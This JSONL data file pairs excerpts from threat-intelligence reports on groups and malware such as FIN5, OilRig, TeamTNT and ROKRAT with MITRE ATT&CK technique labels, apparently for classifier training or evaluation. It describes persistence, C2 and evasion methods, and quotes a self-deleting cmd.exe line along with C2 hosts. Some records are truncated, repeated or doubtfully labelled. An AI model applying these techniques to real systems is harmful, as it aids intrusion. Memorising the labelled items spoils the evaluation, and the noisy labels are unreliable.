{"text1":"FireEye has dubbed the cybercrime gang FIN5. One of the most unique things about FIN5 is that in every intrusion we responded to where FIN5 has been active, legitimate access was identified. They had valid user credentials to remotely log into the network,\" said Barry Vengerik, principal threat analyst at FireEye. No sexy zero-days, no remote exploits -- not even spearphishing","labels":"['T1110']"}
{"text1":"It looks like GrowlHelper creates an executable named Software Update Check when it thinks it\u2019s online. I was pretty excited when I first found this, but quickly realized it just drops a copy of itself with a different name","labels":"['T1036.004']"}
{"text1":"FireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. FireEye's Managed Defense has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection","labels":"['T1555', 'T1003.001', 'T1552.001', 'T1003.005', 'T1555.003', 'T1552.006', 'T1003.004', 'T1588.002']"}
{"text1":"PowerPunch also provides an excellent example of this. The key is applied to an executable payload downloaded directly from adversary infrastructure, allowing for an encryption key unique to the target host (highlighted variables names were changed for clarity","labels":"['T1105']"}
{"text1":"The attackers manually send a command to the JS or C# component to drop and execute a batch file from one of their servers. That batch file writes a malicious INF file and supplies it as a parameter to the Microsoft utility cmstp.exe, which executes a remote scriptlet specified in the INF file. This technique has been documented in the MITRE ATT&CK knowledge base as CMSTP; an example of how this technique is used may be found here. This technique has been used in the past by Cobalt, another financially motivated group. The remote scriptlet contains obfuscated JS code that drops an OCX file and executes it via regsvr32.exe","labels":"['T1059.007']"}
{"text1":"cmd.exe \/C choice \/C Y \/N \/D Y \/T 2 & Del After sleeping, the Trojan will create a GUID and write it to %APPDATA%\\Windows\\GDI.bin. It then moves itself to %APPDATA%\\Windows\\WindowsImplantment.exe and sets both of these files to have the hidden and system flags to hide them from the user. With the Trojan moved its final location, it will then create a scheduled task to run a VBScript to make sure it runs persistently. This differs from the previous OopsIE variant that used a hardcoded task name for the scheduled task. This process ultimately attempts to run the Trojan every three minutes, which is important as OopsIE relies on this scheduled task as it does not include a main loop to continue its execution. After creating this scheduled task for persistence, the Trojan will begin communicating with its C2 server. The process in which the Trojan communicates with its C2 server is very similar to the previous OopsIE Trojan that we discussed in our previous blog. Also, the oops string used to signify and erroneous transmission from the C2, which gave OopsIE its name is reversed to spoo. hex(STDOUT of whoami command)> If the C2 server wishes to send a command, it will respond to the beacon above by echoing the whoami command results sent by the Trojan to the C2 in the URL. The command handler in this OopsIE variant is very similar to the previous version, as it contains the same three (1, 2 and 3) commands seen in Table 2","labels":"['T1105']"}
{"text1":"In october 2016 Group-IB published the report about the Cobalt group. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. However, when there is use of a security policy that prohibits the transfer of encrypted archives, such an email message may be blocked, so the attackers would send .doc files that contain exploits for Microsoft Office (fig. For organizations that perform timely updates of their systems and adhere to strict security policies, the Cobalt group employs another method to deliver malicious code through emails with Word documents containing a malicious macro. Therefore, the Cobalt group registered domains are similar to real ones (for example, diebold.pw), and configured their email server to distribute acting as these legitimate domains (fig. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. Additional means of circumventing anti-virus tools include the use of exploits to increase the level of rights and privileges, bypassing UAC, and injecting code into trusted processes. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed","labels":"['T1068']"}
{"text1":"The dropped payload is a DLL file that has been packed using the UPX packer. The unpacked sample is highly obfuscated and important API calls and strings have been encrypted using a custom encryption algorithm. Whenever in the code the malware needs to use a string, it takes the encrypted string and passes it into two functions to decrypt it","labels":"['T1027.002']"}
{"text1":"This document likely marks the first observed use of this technique by APT28. The use of DDE with PowerShell allows an attacker to execute arbitrary code on a victim\u2019s system regardless whether macros are enabled","labels":"['T1559.002']"}
{"text1":"POWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. POWERTON is designed to support multiple persistence mechanisms, including WMI\u00a0and auto-run registry key. POWERTON typically gets deployed as a later stage backdoor and is obfuscated several layers","labels":"['T1547.001']"}
{"text1":"A batch file that is used to run Bitsadmin and Rundll to download and execute the Egregor payload. A Zip file contains a binary file that is an RClone client, renamed svchost, and RClone config files (webdav, ftp and dropbox) used later for exfiltration","labels":"['T1059.003']"}
{"text1":"The screenshot above shows an abbreviated view of the in-memory PowerShell backdoor. The PowerShell backdoor has the following capabilities","labels":"['T1049', 'T1518', 'T1027']"}
{"text1":"The archive contains two files; the first is an executable file, while the second is a decoy PDF document. The bear\u2019s lair . The Stage-1 downloader will download and execute a new downloader, written in C++, not so different from other Zebrocy downloaders. How the bear hunts . In this section we describe in more detail the commands performed manually by the operators through their Delphi backdoor. As we did not identify a pattern in the order which the commands are invoked, we believe the operators are executing them manually. The first set of commands gathers information about the victim\u2019s computer and environment: The commands above are commonly executed when the operators first connect to a newly activated backdoor. Moreover, the backdoor contains a list of filenames related to credentials from software listed below (database names): The operators take care of retrieving these databases if they are present on the victim\u2019s computer. The operators retrieve these files on the machine using the DOWNLOAD_LIST command. This command can be used when the operators are aware of the presence of interesting files on the computer. This backdoor is executed using the CMD_EXECUTE command: There are some interesting facts here. The first set of commands is the same and executed during a very short timeframe, which raises another question: is it automated","labels":"['T1083']"}
{"text1":"The reason for this is that most of the file comprises meaningless overlay data, since the file is an automatically generated AutoIT executable with an AutoIT3 script embedded inside. Once started, it downloads additional malware from the C2 and also uploads some basic system information, stealing, among other things, the user\u2019s Google Chrome credentials. The backdoor also pings the C2 server at regular intervals. A good security analyst can spot this while analyzing firewall log files and thereby find out that something suspicious might be going on in the network","labels":"['T1105']"}
{"text1":"Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use the \u2018at' or \u2018schtask' commands to register a scheduled task to be executed in a few minutes. Use malware to upload the large list of enumerated files to the C2 server. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. In particular, review network access for use of mobile USB modems on corporate systems","labels":"['T1547.001']"}
{"text1":"This structure parses out executable scripts from data provided via a remote operator. In this case, the REGEX value indicates this implant will receive scripts compressed (tar files). The malware will then decompress them before executing the embedded script. Analysis indicates the WellMail implant is similar in design and structure to the WellMess implant -- and both accept and execute shell scripts from a remote operator","labels":"['T1105']"}
{"text1":"Narrow attacks targeted the Automotive industry among others, while the large malicious spam campaigns appear to be associated with threat actor TA505, an actor responsible for many large-scale attacks since at least 2014","labels":"['T1204.002']"}
{"text1":"We have discovered that malware dubbed WinDealer, spread by Chinese-speaking APT actor LuoYu, has an ability to perform intrusions through a man-on-the-side attack","labels":"['T1204.001', 'T1566.002', 'T1566.001', 'T1566.002', 'T1120']"}
{"text1":"Finally, the malware changes the password of the local users. In the files analyzed, all the passwords chosen by the actor have the same pattern: Aa153","labels":"['T1531']"}
{"text1":"The configuration file for Torisma is encrypted using the algorithm VEST[1] in addition to the communication sent over the C2 channel. From our research this encryption method is not commonly used anywhere, in fact it was a proposed cipher that did not become a standard to be implemented in general technologies[2","labels":"['T1041', 'T1573.001']"}
{"text1":"In response to historical disclosures detailing TA416 PlugX malware infection and encoding methods, the group appears to have adopted a rapid rate of development for their PlugX payloads. The group uses different legitimate PE files to initiate sideloading, as well as a variety of PlugX DLL loaders including the PotPlayer and DocCon versions noted in this publication. TA416 also uses different variants of the final PlugX payload in which the communication routines are observed to be different when closely analyzed. Additionally, the payload DAT file decryption method has evolved regularly since the beginning of 2022. Several observed decryption schemas and a sample configuration are included below with date ranges detailing the evolution of observed PlugX payloads","labels":"['T1027']"}
{"text1":"Usually, after infection the bot sends a \u2018PING\u2019 message, \u2018SYSTEM INFO\u2019 message and \u2018ASK for COMMAND\u2019 message, and the C2 replies with \u2018ACK\u2019 and \u2018COMMAND\u2019 messages. If additional modules were pushed by the C2, the bot sends a \u2018STOLEN INFO\u2019 message containing data stolen by the modules","labels":"['T1041']"}
{"text1":"The malware can use 2 different public RSA keys: one exported using the crypto api in a public blob or using the embedded in base64 in the malware. The malware will only use the second one if it cannot create the crypto context or has some problem with the crypto api functions","labels":"['T1106']"}
{"text1":"Pillowmint is usually installed through a malicious shim database which allows the malware to persist in the system","labels":"['T1546.011']"}
{"text1":"1) An application is bundled with virtualization software, a Linux image and additional files used to achieve persistence. 2) User downloads the application and follows attached instructions on how to install it. 3) LoudMiner is installed first, the actual VST software after. 4) LoudMiner hides itself and becomes persistent on reboot. 5) The Linux virtual machine is launched and the mining starts. 6) Scripts inside the virtual machine can contact the C&C server to update the miner (configuration and binaries","labels":"['T1569.002', 'T1218.007']"}
{"text1":"Once on the network, the attackers engaged in network reconnaissance and retrieved a list of trusted domains and a list of domain controllers with the following commands","labels":"['T1482']"}
{"text1":"When REvil was first discovered, it was delivered to targets via exploitation of Oracle WebLogic vulnerabilities. There are reports that the threat actors leveraged a strategic web compromise (SWC) to deliver REvil by compromising the Italian WinRAR . it website and replacing the WinRAR installation executable with an instance of the malware. The SWC resulted in the infection of unsuspecting WinRAR customers' systems. In other reports, threat actors breached at least three managed service providers (MSPs) and used the access to deploy REvil to the MSPs' customers. The diversity and complexity of delivery mechanisms employed by the REvil threat actors in a short period of time suggest a high level of sophistication","labels":"['T1189']"}
{"text1":"ZxShell.dll is injected in a shared SVCHOST process. The Svchost group registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost is opened and the netsvc group value data is queried to generate a name for the service","labels":"['T1055.001']"}
{"text1":"MSTIC has observed NICKEL actors using exploits against unpatched systems to compromise remote access services and appliances. Upon successful intrusion, they have used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts. MSTIC has also observed NICKEL perform frequent and scheduled data collection and exfiltration from victim networks","labels":"['T1614.001', 'T1082']"}
{"text1":"DriveSlayer is digitally signed using a valid certificate and also abuses a legitimate EaseUS Partition Master driver to gain raw disk access and manipulate the disk to make the system inoperable","labels":"['T1553.002']"}
{"text1":"Like any other typical PoS malware, Pillowmint iterates a list of processes and process them two at a time. it uses the API OpenProcess() using the\u00a0PROCESS_VM_READ and PROCESS_QUERY_INFORMATION flags to obtain a handle then reads the memory\u2019s content via ReadProcessMemory() API two chunks at a time. Depending on the Pillowmint version, it may encrypt the stolen CC data with AES encryption algorithm + Base64. This is then written to a file named \"ldb_e.log\" in Windows System directory","labels":"['T1106']"}
{"text1":"Along with the EDRPOU numbers, the backdoor collects proxy and email settings, including usernames and passwords, from the M.E.Doc application","labels":"['T1087.003']"}
{"text1":"Kimsuky is a highly motivated threat actor targeting a number of entities in South Korea. This group has been relentlessly creating new infection chains to deliver different types of malware to their victims. Such targeted attacks can result in the leak of restricted research, unauthorized access for espionage and even destructive attacks against target organizations","labels":"['T1588.002']"}
{"text1":"Once the Bazar loader downloads its payload, the Bazar backdoor, it is decrypted using the same method as the aforementioned Team9 variant","labels":"['T1104']"}
{"text1":"For the investigators at NCC Group and Fox-IT these pieces of evidence supported the hypothesis of the adversary achieving credentials access by brute force, and more specifically by credential stuffing or password spraying","labels":"['T1589.001']"}
{"text1":"Once gaining the initial foothold into a container, Hildegard establishes either a tmate session or an IRC channel back to the C2. It is unclear how TeamTNT chooses and tasks between these two C2 channels, as both can serve the same purpose. At the time of writing, tmate sessions are the only way the attacker interacts with the compromised containers","labels":"['T1219', 'T1219']"}
{"text1":"After loading its configuration data, GoldMax checks the current date-time value of the compromised system against the activation date from the configuration data","labels":"['T1016', 'T1497.003', 'T1124']"}
{"text1":"Once the VBScript in XSL has been run, console commands launched by the JS code continue to be executed. Three files are copied into the folder OFFICE12 that was created in the user profile. Those files are","labels":"['T1220']"}
{"text1":"POSHSPY makes the most of using built-in Windows features \u2013 so-called \u201cliving off the land\u201d \u2013 to make an especially stealthy backdoor. POSHSPY's use of WMI to both store and persist the backdoor code makes it nearly invisible to anyone not familiar with the intricacies of WMI. Its use of a PowerShell payload means that only legitimate system processes are utilized and that the malicious code execution can only be identified through enhanced logging or in memory. The backdoor's infrequent beaconing, traffic obfuscation, extensive encryption and use of geographically local, legitimate websites for command and control (C2) make identification of its network traffic difficult. Every aspect of POSHSPY is efficient and covert","labels":"['T1059.001']"}
{"text1":"The attack typically begins with an attempt \u2013 most probably via a spearphishing email \u2013 to lure the intended victim into running the malicious dropper, which is attached to the email. In order to increase the likelihood that the unsuspecting victim will actually click on it, the malicious executable masquerades as a document or spreadsheet by displaying a fake icon","labels":"['T1566.001', 'T1204.002']"}
{"text1":"From the main function, the malware invokes a function named eiht_get_update. This function attempts to read a remote file (ret.txt) from andrewka6.pythonanywhere.com that contained the address of the remote command and control server. If that failed, the malware would default to using the hard-coded (albeit encrypted) IP address 167.71.237.219. In order to gather information about the infected host, it invokes a function named: ei_get_host_info \u2026which in turn invokes various macOS APIs such as getlogin and gethostname","labels":"['T1620']"}
{"text1":"It executes the other modules and collects initial information about the machine, including information about the network, locale, and the keyboard language","labels":"['T1082']"}
{"text1":"On February 12, 2018 at 16:45 (all times are in the\u00a0organization\u2019s local time), an email was sent to the organization advertising a job vacancy at an American global service provider. The email contained a malicious link to hxxp:\/\/mynetwork.ddns[DOT].net:880","labels":"['T1566.002']"}
{"text1":"Figure 3 outlines the architecture of Crutch version 3. It includes a backdoor that communicates with a hardcoded Dropbox account using the official HTTP API. In some variants, we noticed the presence of recovery C&C channels using either GitHub or a regular domain","labels":"['T1071.001']"}
{"text1":"Loader Trojan The payload dropped to the system by the macro is an executable that is responsible for installing and executing a dynamic link library (DLL) to the system. The loader has several coding features that make it interesting. Upon execution, the loader will decrypt the embedded payload (DLL) using a custom algorithm followed by decompressing it using the RtlDecompressBuffer API. This API is normally used for Windows drivers, but there is nothing to prevent a userland process from using it, and the parameters are documented on MSDN. The compression algorithm used is LZNT1 with maximum compression level. The payload is decrypted using a starting 10-byte XOR key of: 0x3950BE2CD37B2C7CCBF8. The payload is in the loader at file offset: 0x19880 - 0x1F23C size of 0x59BD. The payload can be decrypted and decompressed with the following Python script","labels":"['T1027']"}
{"text1":"After analyzing the final payload, we determined the winner was\u2026 a Remote Administration Tool, which we have named ROKRAT. The address used in the email was 'kgf2016@yonsei.ac.kr' which is the contact email of the Korea Global Forum where the slogan in 2016 was \"Peace and Unification of the Korean Peninsula\". This fact gives more credit and legitimacy to the email. This file is decoded and finally an executable is launched: ROKRAT. This RAT has the added complexity that the command and control servers are legitimate websites. The malware uses Twitter and two cloud platforms, Yandex and Mediafire, apparently for both C2 communications and exfiltration platforms. Unfortunately, these platforms are difficult to block globally within organizations as their use can be viewed as legitimate in most cases. Additionally, these 3 platforms all make use of HTTPS connectivity, making it much more difficult to identify specific patterns or the usage of specific tokens","labels":"['T1102.002']"}
{"text1":"Skip to main content . We use optional cookies to improve your experience on our websites, such as through social media connections, and to display personalized advertising based on your online activity. If you reject optional cookies, only cookies necessary to provide you the services will be used. Using reg to configure the registry of remote computers limits the parameters that you can use in some operations. Check the syntax and parameters for each operation to verify that they can be used on remote computers . In this article","labels":"['T1112', 'T1012']"}
{"text1":"Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - xxmm downloader (also known as KVNDM) \u2014 This simple downloader's code is similar to the main xxmm payload. MSGet \u2014 This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. MSGet typically downloads encoded binaries from hard-coded URLs. DGet \u2014 This simple downloader (see Figure 4) is similar to the wget web server retrieval tool. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity","labels":"['T1140']"}
{"text1":"All the network parameters are stored in the sample and can be easily updated by the author. The CnC is a web server: http:\/\/camilleoconnell[.]website The network communication is performed in HTTP. The malware uses an hardcoded User-Agent: Mozilla\/5.0 (compatible; Googlebot\/2.1; +http:\/\/www.google.com\/bot.html) To register a new infected system the malware perform a POST request to \/api\/white_walkers\/new with data on the compromised system consisting of","labels":"['T1071.001']"}
{"text1":"The\u202fSodomMain\u202fmodule is\u202fLookBack\u202fmalware\u2019s remote access Trojan module that can send and receive numerous commands indicative of its function as a RAT. The malware is delivered within the encoded data\u202fthat is received by the\u202fSodomNormal\u202fmodule as part of its initial beacon response. It then runs within the\u202fSodomNormal\u202fmodule and\u202fuses its\u202f\u201csend_data\u201d\u202ffunction for C&C communications","labels":"['T1574.002']"}
{"text1":"Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - Screen Capture Tool\u2014 This tool can capture the desktop of a victim's system (see Figure 5). Figure 5. Screen Capture Tool usage. Source: Secureworks) - RarStar \u2014 This custom tool uploads RAR archives to a specified URL as POST data (see Figure 6). RarStar encodes the POST data using Base64 and a custom XOR algorithm. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. WinRAR \u2014 This tool extracts tools for lateral movement and compresses data for exfiltration. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. Install a background monitor tool (e.g","labels":"['T1113']"}
{"text1":"The shellcode then creates a string that it uses to create a registry key to automatically run the final payload each time the system starts. It then opens the registry key 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon' and sets the value to the \"Shell\" subkey to the previously created string. Ultimately, the following registry key is created for persistence","labels":"['T1547.014', 'T1547.004']"}
{"text1":"We at Team Nautilus detected and analyzed the Docker Hub account hildeteamtnt, which was used by TeamTNT to store their malicious images. Also, \u2018minerescape\u2019 contained a shell script executing a Python file - minedaemon.py. Using a web service (iplogger[.]org) to transmit collected data to the attacker during the discovery process, for instance, the number of cores in the CPU, its speed, system details (using uname -a), and targeted host IP address. Logging the activity and encoding it into files (using Base64). The script sbs.sh: - Downloading 00.jpg (as \/usr\/bin\/dns_ipv4.tar.gz) which is the file \/usr\/bin\/bioset. Creating a child process that listens to the socket and communicates with the father using a method called \u2018Named PIPE\u2019 (also known as FIFO). The father is responsible for deciphering messages and writing it back to the child on the PIPE. Creating a child process that listens to the socket and communicates with the father using a method called \u2018Named PIPE\u2019 (also known as FIFO). - The father is responsible for deciphering messages and writing it back to the child on the PIPE. Logging the activity and encoding it into files (using Base64). - Defense Evasion: Deleting command history. Logging the activity and encoding it into files (using Base64). Defense Evasion Techniques: Removing system logs (\/var\/log\/syslog). Deleting command history. Logging the activity and encoding it into files (using Base64). - Defense Evasion Techniques: Removing system logs (\/var\/log\/syslog). Deleting command history. Encoding many snippets with base64 (the same snippet may be encoded multiple times). To sum it up . Over four months, TeamTNT uploaded various images, with some being used to perform attacks in the wild","labels":"['T1027']"}
{"text1":"In September 2017, Proofpoint researchers detailed the history and ongoing activities of an actor we track as TA505. TA505 was behind many of the Dridex campaigns that plagued organizations in 2015 and introduced Locky ransomware in 2016, bringing unprecedented scale to malicious spam distribution. Since we wrote our original TA505 profile, the actor has continued to explore the use of new malicious attachments and new payloads. In 2018, though, the scale and regularity of their campaigns decreased, while the diversity of payloads has increased. Given the importance of this actor in the email threat landscape we wanted to revisit our profile and update it with the latest activity from TA505","labels":"['T1566.001']"}
{"text1":"Remember, Downadup\/Conficker spread so widely because so many computers simply did not have a simple security patch, released months before the infections ever started, applied. Weafer ). - Use a robust security software suite that has multiple layers of protection. Even patched systems are continuing to become infected with the .A and .B variants. In many instances, this is occurring because the worm is being passed on via infected removable media, such as USB thumb drives, that are essentially acting as host carriers. Need to Know) - Use caution when opening attachments and accepting file transfers. Use caution when clicking on links to Web pages. Use strong passwords","labels":"['T1091']"}
{"text1":"FIN6 used encoded PowerShell commands to install Cobalt Strike on compromised systems. The attacker made use of Cobalt Strike\u2019s \u201cpsexec\u201d lateral movement command to create a Windows service named with a random 16-character string on the target system and execute encoded PowerShell. In some cases, the encoded PowerShell commands were used to download and execute content hosted on the paste site hxxps:\/\/pastebin[.]com","labels":"['T1102', 'T1569.002']"}
{"text1":"At this point, the script establishes an HTTP connection to the C2 server. If the server response is comprised only of the same GUID that the malware sent, the script deletes itself. In the case of the second-stage script from Variant A, the script deletes the registry key where it is installed. In the case of Variant C, the script deletes the file from which it is running. If instead the server responds with any data other than the GUID, the second-stage script decrypts the data and saves it as a file","labels":"['T1070.004', 'T1070']"}
{"text1":"Since the original publication of this approach, Proofpoint researchers have observed a number of actors -- \u201cearly adopters\u201d -- abusing this file format by embedding it inside Microsoft Word and PDF documents. While the combination of the technique with the Microsoft Word container was described in the initial research, embedding inside PDFs has not been documented and likely originated with another source","labels":"['T1204.001', 'T1204.002']"}
{"text1":"Then extract the image file \"image1.jpeg\" contained in the document. Find the special logo in the picture data, decode the subsequent steganographic PE data, release the randomly named .exe in the %ALLUSERSPROFILE% directory and run it","labels":"['T1027.003']"}
{"text1":"Enables remote login - Enables screen sharing - Configures remote login permissions for the user - Allows remote login to all - Enables a hidden \u201croot\u201d account in macOS and sets the password specified in the Trojan code","labels":"['T1569.001']"}
{"text1":"The persistence is done during the first execution of the malware using a well-known technique, the \u201cLogon scripts\u201d. It creates a script file registration.bat and writes several strings from the TForm1 object. The final script is","labels":"['T1037.001']"}
{"text1":"The backdoor starts by collecting basic information about the victim\u2019s machine and calculating a 4-byte long victim identifier, based on the user-name, computer-name and the domain name of the target environment","labels":"['T1082']"}
{"text1":"To install Weave Scope on the server the attackers use an exposed Docker API port and create a new privileged container with a clean Ubuntu image. The container is configured to mount the file system of the container to the filesystem of the victim server, thus gaining the attackers access to all files on the server. The initial command given to the container is to download and execute several cryptominers","labels":"['T1611']"}
{"text1":"Watering holes - Weaponized documents exploiting the Dynamic Data Exchange (DDE) method - Weaponized documents exploiting the CVE-2018-0798 vulnerability in Equation Editor - Exploitation of the CVE-2019-0604 vulnerability in Sharepoint - Supply chain attack that compromises a chat software installer, Able Desktop - Exploitation of recent vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in Microsoft Exchange Server","labels":"['T1195.002', 'T1190']"}
{"text1":"This variant has exactly the same features as the previous variant: file listing, OS version getting, process killing, drive listing, execution via ShellExecuteW(), execution via named pipe, cleaning, file removal, file downloading. Here is an example of code similarities on the execution via named pipe function. On the left a sample from Bisonal 2014 and on the right Bisonal 2011","labels":"['T1105']"}
{"text1":"Despite the simplicity of most of their tools, the Gamaredon group also is capable of deploying some novelty, such as their Outlook VBA module. However, as it is far from stealthy, in the long run it is no match for a capable organization. The variety of tools Gamaredon has at its disposal can be very effective at fingerprinting a machine and understanding what sensitive data is available, then spreading throughout the network","labels":"['T1025']"}
{"text1":"The communication between the malware and the server is based on the HTTP protocol and slightly varies between the samples. Every few seconds the backdoor sends a POST request to the C&C URL. The result is encrypted and sent back to another URL on the server as the parameter of a POST request","labels":"['T1071.001']"}
{"text1":"Check for blocklisted usernames and computernames: The implant concatenates the username and computer it acquires from the infected endpoint's environment variables. This string is then checked against a list of blocklisted values to determine if the implant should continue execution or exit out. Check for blocklisted process names: The following process names are blocklisted and if found running on the system, the RAT implant will simply exit. The blocklist consists of processes belonging to Virtual Machine software (such as VMWare) and analysis tools (such as ProcessHacker etc","labels":"['T1033', 'T1057', 'T1082', 'T1497.001']"}
{"text1":"It also creates a unique system specific identifier that it will use during the C2 communications to send and receive messages. The system specific identifier is a 16 character string that the Trojan creates using the serial number of the C volume and the first 4 hexadecimal bytes from Environment.UserName","labels":"['T1071.003']"}
{"text1":"This document uses KernelCallbackTable as well to hijack the control flow just like our first module, the injection technique used by the shellcode also resembles the first document. The major difference in this document is that it tries to retrieve a remote HTML page and then executes it using mshta.exe. The remote HTML page is located at https[:]\/\/markettrendingcenter[.]com\/member.htm and throws a 404 Not Found which makes it difficult for us to analyze this document any further","labels":"['T1218.005']"}
{"text1":"2) Download the OpenSSL library. Instead of saving the downloaded file, QakBot measures the download speed and deletes the received file","labels":"['T1016.001']"}
{"text1":"This script is executed and is used to decode a static base64 string within the strEncode variable. Using base64 encoding the decoded binary is stored as HncModuleUpdate.exe and is then executed. This specific resource contains malicious shellcode used by the malware. These execution steps allow the launch of the new ROKRAT variant by decoding the PE binary and injecting into the cmd.exe process","labels":"['T1059.005']"}
{"text1":"In their example, the OilRig group used a malicious macro document to deliver the backdoor, which is a tactic much more commonly used by them. A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation. Invoke-Obfuscation has proven to be highly effective at obfuscating PowerShell scripts and in this case, the adversary was able to take advantage of the tool for increased chances of evasion and as an anti-analysis tactic. Based on our telemetry, we have high confidence the email account used to launch this attack was compromised by the OilRig group, likely via credential theft. The malicious attachment was a simple PE file (SHA256: 5f001f3387ddfc0314446d0c950da2cec4c786e2374d42beb3acce6883bb4e63) with the filename <redacted> Technical Services.exe. Its sole purpose here is to install the QUADAGENT backdoor and execute it. Once the victim downloads and executes the email attachment, it runs silently with no additional decoy documents or decoy dialog boxes. The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it. Once the QUADAGENT payload has executed, it will use rdppath[.]com as the C2, first via HTTPS, then HTTP, then via DNS tunneling, each being used as a corresponding fallback channel if the former fails","labels":"['T1204.001']"}
{"text1":"From our analysis, stealing keystrokes is the main function of RunningRat; however, the DLL has code for more extensive functionality. Code is included to copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and much more. However, our current analysis shows no way for such code to be executed","labels":"['T1070.004', 'T1070.001']"}
{"text1":"BackdoorDiplomacy is a group that primarily targets diplomatic organizations in the Middle East and Africa, and less frequently, telecommunication companies. Their initial attack methodology is focused on exploiting vulnerable internet-exposed applications on webservers, in order to drop and execute a webshell. Post compromise, via the webshell, BackdoorDiplomacy deploys open-source software for reconnaissance and information gathering, and favors the use of DLL search order hijacking to install its backdoor, Turian. Finally, BackdoorDiplomacy employs a separate executable to detect removable media, likely USB flash drives, and copy their contents to the main drive\u2019s recycle bin","labels":"['T1574.001']"}
{"text1":"It will use an auto-run registry (HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run) named AdobeMX that will execute PowerShell to load the encoded executable via reflective loading (loading an executable from memory rather than from the system\u2019s disks","labels":"['T1059.001']"}
{"text1":"Change file owner and group. This utility is used by malware to change the user ID and\/or the group ID of the specified files. This can lock other users\u2019 out of access to the file, thus hampering removal or inspection. It may also be required in order to execute a file in certain, elevated context","labels":"['T1562.001']"}
{"text1":"The iContact binary appears to be a backdoor that gathers user and locale data and engages in encrypted communications with a C2 server over TCP. Functionality includes sending and receiving files and running custom commands such as scanning a directory and deleting files","labels":"['T1005']"}
{"text1":"Overview of discovered Ramsay versions . Malicious documents dropping Ramsay version 1 . This attack vector consists of malicious documents exploiting CVE-2017-0199 intended to drop an older version of Ramsay. Based on the low complexity of the Ramsay agent delivered, the threat actors may be embedding this specific instance within these malicious documents for evaluation purposes. Even though affected documents will be modified, it won\u2019t impact their integrity; each affected Word document remains fully operational after artifact appending has taken place. First, Ramsay looks for Word documents and also, in more recent versions, for PDFs and ZIP archives: Figure 13. Hex-Rays output of spreader scanning routines . It is important to notice that there is a correlation between the target drives Ramsay scans for propagation and control document retrieval. File structure changes during an infection and execution . All of the different artifacts involved in the infection stage are either within the context of the spreader or dropped previously by another Ramsay component. This information will be contained within all logged information Ramsay collects and may be leveraged by operators in order to do further lateral movement over the network in a later stage via a different channel. Some of Ramsay and Retro filename convention . Is important to highlight that among Retro\u2019s documented techniques, it leverages malicious instances of msfte.dll, oci.dll and lame_enc.dll, and via Phantom DLL Hijacking. As previously documented, Ramsay also uses this technique in some of its versions also using msfte.dll and oci.dll. Finally, we noticed Korean language metadata within the malicious documents leveraged by Ramsay, denoting the use of Korean-based templates","labels":"['T1027']"}
{"text1":"When G-Data published on Turla\/Uroburos back in February, several questions remained unanswered. One big unknown was the infection vector for Turla (aka Snake or Uroburos). Our analysis indicates that victims are infected via a sophisticated multi-stage attack, which begins with the Epic Turla. In time, as the attackers gain confidence, this is upgraded to more sophisticated backdoors, such as the Carbon\/Cobra system. Sometimes, both backdoors are run in tandem, and used to \u201crescue\u201d each other if communications are lost with one of the backdoors","labels":"['T1124', 'T1057', 'T1049', 'T1018']"}
